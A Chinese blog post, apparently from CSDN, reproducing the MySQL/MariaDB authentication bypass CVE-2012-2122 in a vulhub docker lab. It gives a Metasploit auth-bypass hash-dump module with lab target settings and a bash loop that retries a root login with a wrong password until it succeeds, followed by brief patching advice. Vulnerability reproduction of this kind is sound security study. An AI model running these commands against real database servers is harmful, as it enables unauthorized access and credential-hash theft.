CVE-2012-2122 Mysql身份认证漏洞及利用

最新推荐文章于 2023-06-12 16:35:21 发布
最新推荐文章于 2023-06-12 16:35:21 发布
阅读量3.9k 收藏 5
点赞数 1
分类专栏: 漏洞复现 文章标签: mysql 数据库 渗透测试 安全漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41924764/article/details/113101932
版权

目录

漏洞描述

  当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。

影响版本

  • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
  • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

漏洞环境搭建

使用vulhub直接docker一键启动环境CVE-2012-2122环境

docker快速入门以及漏洞环境搭建

下载安装好vulhub后进入/vulhub/mysql/CVE-2012-2122目录,执行以下命令启动环境

sudo docker-compose up -d

在这里插入图片描述

查看docker镜像是否启动成功

sudo docker ps

在这里插入图片描述

漏洞分析

MariaDB/MySQL 概率性任意密码(身份认证)登录漏洞(CVE-2012-2122)

漏洞检测

  • 利用此漏洞需要知道mysql用户名

msf

search CVE-2012-2122
use auxiliary/scanner/mysql/mysql_authbypass_hashdump
set rhosts 192.168.154.3
run

在这里插入图片描述

漏洞利用

linux下执行命令:(利用for循环去做验证)

for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.154.3  ; done

在这里插入图片描述

漏洞加固建议

  1. 升级官方补丁
  2. 更新mysql

参考链接

https://www.freebuf.com/vuls/3815.html
https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122
https://www.cnblogs.com/zhuxr/p/9553541.html

丶没胡子的猫
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python爬取漏洞库.zip
12-23
本代码使用python3爬取CNVD、CNNVD和CVE漏洞库并存入本地mysql数据库,可以实现漏洞预览,增量爬取完整爬取等功能,并以GUI形式展现。
oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip
01-19
CVE-2012-1675 补丁 oracle 11.2.0.1
CVE 2012-2122
qq_56895581的博客
05-19 205
我们使用exp在对应版本上的服务进行登陆时,即便密码错误也能成功以root用户登录
Mysql 身份认证绕过漏洞CVE-2012-2122
ws_001的博客
06-12 1056
Mysql 身份认证绕过漏洞CVE-2012-2122
Mysql 身份认证绕过漏洞CVE-2012-2122)复现
weixin_64809022的博客
03-20 251
首先进入输入cd /vuluhub/mysql 的根目录下,然后ls查看内容,我们可以看到靶场的编号,进入这个编号的目录下,使用命令 docker-compose up -d启动靶场。这样我们就可以直接进入MySQL中,然后就可以执行MySQL的相关命令了。这里我们可以看到靶场的IP地址,以及MySQL的监听端口3306。1. 然后我们进入kali,使用扫描出靶场的IP地址。首先,启动msf数据库服务,进入msfconsole。首先我们要搭建MySQL的环境,启动docker。第一种方法:利用msf验证。
MySql身份认证绕过漏洞(CVE-2012-2122)
dgjkkhcf的博客
07-24 4560
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。.........
mysql身份认证绕过漏洞复现(CVE-2012-2122
weixin_53730939的博客
03-12 837
mysql身份认证绕过漏洞复现(CVE-2012-2122
Mysql身份认证漏洞利用(CVE-2012-2122)
qq_50854662的博客
03-01 2445
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。 受影响的产品: All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. MariaDB version
漏洞CVE 2012-2122复现——Mysql身份验证绕过
人若有志,就不会在半坡停止。
08-25 933
漏洞CVE 2012-2122复现——Mysql身份验证绕过
Oracle Database Server 'TNS Listener'远程数据投毒漏洞CVE-2012-1675)的解决文档
05-25
链接:http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html 根据此链接得到解决方法: ? 1234 SolutionRecommendations for protecting against this vulnerability can be found ...
jboss4版本修复Apache Tomcat DIGEST身份验证多个安全漏洞(CVE-2012-3439)升级包
04-25
jboss4版本下,jbossweb-tomcat55.sar升级包,修复Apache Tomcat DIGEST身份验证多个安全漏洞(CVE-2012-3439) 升级包中的jar来源于tomcat5.5.36 使用方法:直接替换jboss中旧的jbossweb-tomcat55.sar
MS17-010(永恒之蓝) 漏洞检测及利用教程
丶没胡子的猫
11-13 5650
漏洞描述: 攻击者向 Microsoft 服务器消息块SMB服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。 影响版本: - Windows Vista - Windows 7 - Windows 8.1 - Windows RT 8.1 - Windows 10 - Windows Server 2008 和 Windows Server 2008 R2 - Windows Server 2012 和 Windows Server 201
CVE-2017-7529 Nginx越界读取缓存漏洞
丶没胡子的猫
01-26 3882
目录漏洞描述影响版本漏洞环境搭建漏洞原理漏洞利用漏洞加固参考链接 漏洞描述   从0.5.6到1.13.2(含)的Nginx版本容易受到nginx范围过滤器模块中整数溢出漏洞的攻击,从而导致特制请求触发的潜在敏感信息泄漏。 影响版本 Nginx 0.5.6 – 1.13.2 漏洞环境搭建 使用docker 启动vulhub中的CVE-2017-7529环境 docker快速入门以及漏洞环境搭建 漏洞原理 Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,
CVE-2018-12613 PHPmyadmin文件包含漏洞分析及漏洞利用
丶没胡子的猫
11-20 3724
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固 漏洞描述    影响版本 漏洞环境搭建 漏洞分析 漏洞利用 漏洞加固
CVE-2020-1938 Apache-Tomcat-Ajp (幽灵猫)文件包含漏洞复现
丶没胡子的猫
11-15 3484
目录漏洞描述影响版本漏洞环境搭建漏洞利用任意文件读取本地包含命令执行,测试ping dnslog反弹shell漏洞加固参考文章 漏洞描述   该漏洞使攻击者可以读取任何webapps文件(例如webapp配置文件,源代码等)或包括一个文件来远程执行代码。由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。 影响版本 Apache Tomcat 6 Apache Tomcat 7 &lt
CVE-2012-2122
最新发布
07-27
CVE-2012-2122是一个与MySQL数据库相关的漏洞,它被称为MySQL Remote Root Code Execution漏洞。该漏洞的存在使得攻击者能够通过使用特定的恶意用户账户和认证方法,执行任意代码并获得数据库的root权限。这个漏洞2012年被公开,并且影响了一些较旧版本的MySQL服务器。为了修复这个漏洞,用户需要升级他们的MySQL服务器到受影响版本的修复版本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值